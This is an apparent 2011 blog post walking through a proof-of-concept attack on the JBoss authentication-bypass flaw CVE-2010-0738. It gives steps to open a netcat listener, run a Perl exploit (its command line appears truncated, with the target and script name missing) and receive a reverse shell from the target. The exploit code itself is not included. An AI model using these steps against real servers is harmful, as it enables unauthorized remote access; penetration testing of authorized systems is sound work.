Saturday, 12 March 2011

Proof of concept on jboss exploit (CVE-2010-0738)

CVE: CVE-2010-0738
Remote: Yes
Local: No
Url about the vuln and  download of the exploit :

JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple  authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions to obtain sensitive information or gain unauthorized access  to the application.
Ok, now lets rock and roll!
1) Open 2 shell's on your backtrack or your pentest machine
2) In the first one you have to prepare your pentest server to receive the connection back from the target machine, so you have to type in this shell : nc -l -p 8000 -vvv
3) Now, in the other shell run the exploit :  perl 8080 8000 lnx

If you see this in the exploit shell, it means it worked!


Now go to your other shell and you should have your reverse shell connected!

Have fun.

No comments:

Post a Comment